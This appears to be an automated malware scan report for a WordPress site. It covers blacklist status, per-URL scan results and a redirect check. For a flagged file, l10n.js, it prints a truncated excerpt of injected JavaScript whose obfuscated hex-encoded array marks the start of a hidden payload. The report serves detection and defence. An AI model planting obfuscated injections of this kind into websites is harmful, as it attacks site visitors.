Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=webanalyticsreportingteam.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webanalyticsreportingteam.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://webanalyticsreportingteam.com/ | 200 OK Content-Length: 51812 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/sample-page | 200 OK Content-Length: 9926 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 1644 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\
Antivirus reports:
http://webanalyticsreportingteam.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2122 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
Antivirus reports:
http://webanalyticsreportingteam.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 18:56:58 GMT Pragma: no-cache Location: http://webanalyticsreportingteam.com/wp-login.php?redirect_to=http%3A%2F%2Fwebanalyticsreportingteam.com%2Fwp-admin%2F&reauth=1 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 01 Oct 2014 18:57:00 GMT | clean |
http://webanalyticsreportingteam.com/wp-login.php?redirect_to=http%3a%2f%2fwebanalyticsreportingteam.com%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2340 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1970 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/wp-login.php | 200 OK Content-Length: 2340 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/test404page.js | 404 Not Found Content-Length: 3890 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/altin-fiyatlari.html | 200 OK Content-Length: 12853 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/tatil.html | 200 OK Content-Length: 12517 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/kamerali-sohbet.html | 200 OK Content-Length: 13873 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/lazer-epilasyon.html | 200 OK Content-Length: 17601 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/maurers-zayiflama.html | 200 OK Content-Length: 12549 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/biber-hapi.html | 200 OK Content-Length: 12728 Content-Type: text/html | clean |
http://webanalyticsreportingteam.com/fx15.html | 200 OK Content-Length: 14160 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:56:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 51812
Content-Type: text/html; charset=UTF-8
X-Pingback: http://webanalyticsreportingteam.com/xmlrpc.php
...51812 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: webanalyticsreportingteam.com
Referer: http://www.google.com/search?q=webanalyticsreportingteam.com
Result:
The result is similar to the first query. There are no suspicious redirects found.